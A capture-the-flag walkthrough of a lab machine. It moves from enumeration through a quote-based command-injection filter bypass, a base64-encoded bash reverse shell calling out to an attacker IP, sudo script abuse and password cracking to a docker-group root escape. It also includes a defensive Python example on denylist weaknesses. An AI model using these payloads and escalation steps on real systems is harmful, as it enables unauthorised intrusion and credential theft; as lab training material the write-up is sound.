Target IP: 10.10.167.84
There are three TCP ports open on the target machine: FTP, SSH, and HTTP. I will start enumeration with FTP, as it allows anonymous login.
Port 21: FTP
This FTP service allows anonymous login. It contains a text file called note.txt with the content shown above. The file hints at two usernames, anurodh and apaar, and at the web application using some form of filtering.
Port 80: HTTP
The webpage above is displayed for this application.
I performed a directory search using the command gobuster dir -u http://10.10.167.84/ -w /usr/share/wordlists/dirb/big.txt -x php,html,txt and obtained the result above. There is an interesting page called /secret/index.php.
Browsing to /secret/index.php displays the page above. It offers command execution. Is the target machine vulnerable to command injection?
Running commands such as ls is prohibited: the message above is shown and the command is not executed. But there are numerous ways to bypass this!
The command ls is blocked, but l's' is accepted, since the quotes defeat the filter.
I used the payload c'a't index.php to read the source code of this page and identify the whitelist and blacklist filters in place; the output above is the source code. The blacklist filter gives a lot of information. It is very simple and can be bypassed in many ways, for example by inserting an even number of ' characters into a command.
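As an added example (not part of the original writeup), the Python below shows why a simple blacklist like the one described above fails against quote-obfuscated commands, and what a defender should do instead: normalise shell quoting before any denylist check, and, better, allowlist the few commands the page actually needs. The denylist and allowlist contents are constructed assumptions, not the target's real filter.

```python
import re
import shlex

# Constructed denylist in the spirit of the simple blacklist described above;
# it is an assumption for this example, not the target's actual filter.
DENYLIST = {"ls", "cat", "bash", "sh", "nc"}
# Constructed allowlist of the only commands the page should ever run.
ALLOWLIST = {"date", "uptime"}
# Plain tokens only: |, ;, >, &, $(...), backticks never match this.
SAFE_TOKEN = re.compile(r"[A-Za-z0-9_./-]+")

def naive_blocked(cmd):
    """Whole-word match on the raw input: how a simple blacklist behaves."""
    return any(tok in DENYLIST for tok in cmd.split())

def normalize(cmd):
    """Resolve shell quoting the way the shell would (l's' -> ls)."""
    try:
        return shlex.split(cmd)
    except ValueError:
        # Unbalanced quoting: keep the raw text so it is judged as-is.
        return [cmd]

def normalized_blocked(cmd):
    """Denylist match after quote removal, checking every pipeline stage."""
    for tok in normalize(cmd):
        if tok.rsplit("/", 1)[-1] in DENYLIST:   # /bin/bash -> bash
            return True
    return False

def allowlist_ok(cmd):
    """Robust approach: first word must be allowlisted and every token must
    be plain characters, so pipes, redirects and substitutions are rejected."""
    tokens = normalize(cmd)
    return (bool(tokens) and tokens[0] in ALLOWLIST
            and all(SAFE_TOKEN.fullmatch(t) for t in tokens))

if __name__ == "__main__":
    for c in ("ls", "l's'", "c'a't index.php", "date"):
        print(f"{c!r:20} naive={naive_blocked(c)} "
              f"normalized={normalized_blocked(c)} allow={allowlist_ok(c)}")
```

Normalising with shlex only narrows the gap (other shell tricks remain); the allowlist check is the one to rely on.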
I used the payload /bin/bash -i >& /dev/tcp/10.14.55.153/8443 0>&1. Base64-encoding this payload gives L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjE0LjU1LjE1My84NDQzIDA+JjE=. I then prefixed it with echo and suffixed it with |base64 -d | bash. I started a listener on port 8443, sent the payload, and received a reverse shell connection from the target machine. Now I have a foothold on the machine. The full payload is shown below.
echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjE0LjU1LjE1My84NDQzIDA+JjE='| base64 -d | b'a'sh
It looks like /home/apaar/.helpline.sh can be executed with sudo as apaar. The line containing $msg 2>/dev/null in that script is responsible for the command execution.
Now I have a shell as apaar. I entered /bin/sh and then python3 -c 'import pty; pty.spawn("/bin/bash");' to spawn an interactive shell through Python's pty module.
The /var/www/files/index.php file contains the credentials root:!@m+her00+@db.
With these credentials I now have access to the MySQL service.
There is an interesting database called webportal with the table users. This table contains the entries shown above.
I copied the two password hashes into a text file called hash and ran john on it, obtaining the passwords above. However, spraying these credentials against the different users did not work.
The page hacker.php gives us a hint about the image.
There is an interesting directory with images. I started a Python HTTP server on the target machine and downloaded the two files to my local machine.
The image contains a zip file called backup.zip, but it is password protected. Using john, I obtained the hash of this file and cracked it. The recovered password is pass1word.
I extracted the file source_code.php, which contains the information above. The password of the user anurodh is encoded in base64.
After decoding it, I obtained the password !d0ntKn0wmYp@ssw0rd and used it to log in over SSH.
Running id shows that the user is a member of the docker group. I used the command docker run -v /:/mnt --rm -it alpine chroot /mnt sh to break out through docker. Now I have a root shell. GG.
The local.txt flag, obtained once I escalated my privileges to apaar.
The proof.txt flag.